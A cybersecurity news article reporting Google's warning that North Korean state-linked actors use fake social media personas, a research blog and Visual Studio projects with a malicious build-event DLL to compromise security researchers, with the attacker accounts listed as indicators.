Home News North Korean Cybercriminals Target Security Researchers: Google

North Korean Cybercriminals Target Security Researchers: Google

Google has warned the security research community to be vigilant when contacted by unknown individuals on social media. Reportedly, North-Korean threat actors are using social engineering tactics to target security experts with fake social media accounts and research blogs.

Cryptocurrency Lazarus, North Korean TA406, Lazarus Group , Korea Atomic Energy Research Institute

Google’s Threat Analysis Group (TAG) has uncovered an ongoing cyber campaign targeting security experts working on vulnerability research and development at various organizations. In an official release, the security giant stated that threat actors behind the campaign are linked to North Korean government-backed entity. Google warned the security research community that they might be a target for attackers and asked to remain vigilant while connecting with unknown individuals on social networking platforms.

Attackers with Fake Personas

Cybercriminals created multiple fake profiles on various social media handles, including Twitter, Telegram, LinkedIn, Discord, and Keybase, to reach out to security professionals working in various vulnerability disclosure programs. Besides, hackers prepared research blogs containing write-ups and vulnerability disclosure analysis, illicitly obtained from legitimate security researchers, to build credibility and connect with the security research community.

“The actors established a research blog and multiple Twitter profiles to interact with potential targets. They’ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control,” Google said.

Hacker-controlled Websites and Social Media Accounts

 Exploit Research Blog:

https://blog.br0vvnn[.]io

Twitter Handles:

  • https://twitter.com/br0vvnn
  • https://twitter.com/BrownSec3Labs
  • https://twitter.com/dev0exp
  • https://twitter.com/djokovic808
  • https://twitter.com/henya290
  • https://twitter.com/james0x40
  • https://twitter.com/m5t0r
  • https://twitter.com/mvp4p3r
  • https://twitter.com/tjrim91
  • https://twitter.com/z0x55g

LinkedIn

  • https://www.linkedin.com/in/billy-brown-a6678b1b8/
  • https://www.linkedin.com/in/guo-zhang-b152721bb/
  • https://www.linkedin.com/in/hyungwoo-lee-6985501b9/
  • https://www.linkedin.com/in/linshuang-li-aa696391bb/
  • https://www.linkedin.com/in/rimmer-trajan-2806b21bb/

Keybase

  • https://keybase.io/zhangguo

 Telegram

  • https://t.me/james50d

Social Engineering Attacks on Researchers

Google stated that threat actors have been targeting security researchers using social engineering tactics. The computers of several security researchers were compromised after visiting attackers’ blogs or by clicking on fraudulent links on social media accounts.

“After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains,” Google added.